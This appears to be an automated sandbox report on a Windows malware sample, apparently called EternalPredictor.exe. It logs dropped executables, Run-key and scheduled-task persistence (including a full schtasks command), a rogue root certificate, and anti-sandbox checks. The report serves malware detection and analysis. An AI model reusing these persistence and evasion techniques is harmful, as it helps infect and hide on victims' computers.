                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pydJump to dropped file
                        Source: C:\Users\user\Desktop\EternalPredictor.exeFile created: C:\Users\user\AppData\Roaming\eternal.exeJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pydJump to dropped file
                        Source: C:\Users\user\AppData\Roaming\program.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pydJump to dropped file

                        Boot Survival

                        Source: C:\Users\user\AppData\Roaming\skuld.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Realtek HD Audio Universal Service
                        Source: C:\Users\user\AppData\Roaming\eternal.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run XClient
                        Source: C:\Users\user\AppData\Roaming\eternal.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "XClient" /tr "C:\Users\user\AppData\Roaming\XClient.exe"
                        Source: C:\Users\user\AppData\Roaming\eternal.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk
                        Source: C:\Users\user\AppData\Roaming\skuld.exe | Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgr
                        Source: C:\Users\user\AppData\Roaming\program.exe | File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ? .scr

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                        Source: C:\Users\user\AppData\Roaming\program.exeCode function: 5_2_00007FF72C6576C0 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,5_2_00007FF72C6576C0
                        Source: C:\Users\user\AppData\Roaming\skuld.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT
                        Source: C:\Users\user\AppData\Roaming\skuld.exe | Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\EternalPredictor.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\eternal.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\AppData\Roaming\skuld.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Users\user\AppData\Roaming\XClient.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\tasklist.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\systeminfo.exe Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com User-Agent: Go-http-client/1.1 Accept-Encoding: gzip
                        Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                        Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter
                        Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : ASSOCIATORS OF {Win32_NetworkAdapter.DeviceID="1"} WHERE ResultClass=Win32_NetworkAdapterConfiguration
                        Source: C:\Windows\System32\getmac.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_NetworkAdapterSetting where Element="Win32_NetworkAdapter.DeviceID=\"1\""
                        Source: C:\Users\user\AppData\Roaming\eternal.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Memory allocated: 1FC0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Memory allocated: 1BCF0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Memory allocated: 2BC0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Memory allocated: 1AE80000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1350000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1AE10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 1500000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Roaming\XClient.exe Memory allocated: 16E0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\EternalPredictor.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\eternal.exe Window / User API: threadDelayed 8611
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3681
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3682
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2867
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 445
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2770
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5023
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3668
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\rar.exe
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\python313.dll
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pyd
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.dll
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pyd
                        Source: C:\Users\user\AppData\Roaming\program.exe Check user administrative privileges: GetTokenInformation
                        Source: C:\Users\user\AppData\Roaming\program.exe API coverage: 7.8 %
                        Source: C:\Users\user\Desktop\EternalPredictor.exe TID: 3552 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\eternal.exe TID: 6424 Thread sleep time: -7378697629483816s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4040 Thread sleep count: 3681 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7392 Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6644 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4536 Thread sleep count: 3682 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7380 Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6996 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4648 Thread sleep count: 2867 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7388 Thread sleep time: -2767011611056431s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4216 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 7308 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8100 Thread sleep count: 445 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7524 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7024 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8160 Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8140 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 4216 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3032 Thread sleep count: 5023 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5420 Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5040 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784 Thread sleep count: 3668 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7612 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7796 Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                        Source: C:\Windows\System32\wbem\WMIC.exe WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\tree.com WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
                        Source: C:\Windows\System32\systeminfo.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                        Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                        Source: C:\Users\user\AppData\Roaming\eternal.exe File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\XClient.exe | File Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C659280 FindFirstFileExW,FindClose,5_2_00007FF72C659280
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C6583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,5_2_00007FF72C6583C0
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 5_2_00007FF72C671874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,5_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C659280 FindFirstFileExW,FindClose,8_2_00007FF72C659280
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C671874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF72C671874
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FF72C6583C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,8_2_00007FF72C6583C0
                        Source: C:\Users\user\AppData\Roaming\program.exe | Code function: 8_2_00007FFBA67A1230 GetSystemInfo,8_2_00007FFBA67A1230
                        Source: C:\Users\user\Desktop\EternalPredictor.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Roaming\eternal.exe | Thread delayed: delay time: 922337203685477
